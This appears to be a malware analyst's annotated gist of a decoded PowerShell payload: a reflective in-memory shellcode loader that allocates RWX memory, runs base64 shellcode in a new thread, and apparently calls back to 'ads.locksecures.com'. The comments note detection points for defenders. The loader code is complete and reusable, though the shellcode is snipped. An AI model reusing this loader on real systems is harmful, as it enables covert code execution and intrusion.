powershell payload decoded
# Formatting tweaked for readability as an embedded gist, will not execute | |
# commented as well | |
# Analyst notes: this is a reflective in-memory shellcode loader. It resolves Win32 APIs
# through .NET reflection (no Add-Type / P/Invoke declaration is compiled), allocates an
# RWX buffer, copies the shellcode in, and starts a thread on it. Each stage below is a
# useful detection / hunting point for defenders.
Set-StrictMode -Version 2 | |
# The whole loader is kept as a literal here-string and handed to IEX later, so the text
# below is exactly what the engine parses; Script Block Logging (Event ID 4104) would
# normally capture this content at that moment.
$DoIt = @' | |
# func_get_proc_address: returns the address of an export ($var_procedure) from a loaded
# module ($var_module) by calling GetModuleHandle and then GetProcAddress through the
# non-public Microsoft.Win32.UnsafeNativeMethods type in System.dll, which is located by
# scanning the GAC assemblies currently loaded in the AppDomain.
# Detection: the string 'Microsoft.Win32.UnsafeNativeMethods' next to
# GetProcAddress / GetModuleHandle is a well-known indicator of this loader pattern.
function func_get_proc_address { | |
Param ($var_module, $var_procedure) | |
$var_unsafe_native_methods = ( | |
[AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { | |
$_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') | |
}).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
return $var_unsafe_native_methods.GetMethod('GetProcAddress').Invoke( | |
$null, | |
@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef( | |
(New-Object IntPtr), | |
($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) | |
} | |
# func_get_delegate_type: builds a delegate type at runtime with Reflection.Emit so the raw
# function pointers resolved above can be invoked with a typed signature
# ($var_parameters -> $var_return_type, default [Void]).
# The assembly / module / type names ('ReflectedDelegate', 'InMemoryModule',
# 'MyDelegateType') are hard-coded and therefore show up in memory and module enumeration.
function func_get_delegate_type { | |
Param ( | |
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, | |
[Parameter(Position = 1)] [Type] $var_return_type = [Void] | |
) | |
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly( | |
(New-Object System.Reflection.AssemblyName('ReflectedDelegate')), | |
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) | |
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') | |
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') | |
return $var_type_builder.CreateType() | |
} | |
# base64 encoded shellcode (body snipped in this gist).
# The leading characters decode to fc e8 89 00 00 00 60 89 e5, the familiar x86
# "cld; call; pushad; mov ebp,esp" shellcode prologue; the trailing characters decode to a
# NUL-terminated hostname ending in "ads.locksecures.com" - likely the callback host.
# Verify by decoding the full string before relying on it as an IoC.
[Byte[]]$var_code = [System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1[**********SNIP**********]9hZHMubG9ja3NlY3VyZXMuY29tAA==") | |
# allocate a buffer and copy the shellcode into the buffer | |
# VirtualAlloc(NULL, len, 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE).
# A private RWX allocation made from a PowerShell process is a high-signal event for
# EDR and memory-scanning tools.
$var_buffer = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer( | |
(func_get_proc_address kernel32.dll VirtualAlloc), | |
(func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke( | |
[IntPtr]::Zero, $var_code.Length,0x3000, 0x40) | |
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length) | |
# HANDLE CreateThread( | |
# LPSECURITY_ATTRIBUTES lpThreadAttributes, | |
# SIZE_T dwStackSize, | |
# LPTHREAD_START_ROUTINE lpStartAddress, | |
# __drv_aliasesMem LPVOID lpParameter, | |
# DWORD dwCreationFlags, | |
# LPDWORD lpThreadId); | |
# create a thread, the lpStartAddress is the buffer containing the shellcode ($var_buffer) | |
# Arguments: attributes NULL, default stack (0), no parameter, flags 0 (start immediately),
# no thread-id out pointer - the new thread begins executing directly inside the RWX buffer.
$var_hthread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer( | |
(func_get_proc_address kernel32.dll CreateThread), | |
(func_get_delegate_type @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke( | |
[IntPtr]::Zero,0,$var_buffer,[IntPtr]::Zero,0,[IntPtr]::Zero) | |
# WaitForSingleObject(hThread, 0xffffffff = INFINITE): the host PowerShell process blocks
# for as long as the implant thread is alive, so it stays resident and visible in process lists.
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll WaitForSingleObject), (func_get_delegate_type @([IntPtr], [Int32]))).Invoke($var_hthread,0xffffffff) | Out-Null | |
'@ | |
# On a 64-bit PowerShell host the loader is re-run inside a 32-bit job (Start-Job -RunAs32),
# which implies the shellcode is 32-bit; a 64-bit powershell.exe spawning a 32-bit PowerShell
# child that then IEXs a large string is itself a detectable process-tree pattern.
# On a 32-bit host the here-string is simply IEX'd in the current process.
If ([IntPtr]::size -eq 8) { | |
start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job | |
} | |
else { | |
IEX $DoIt | |
} |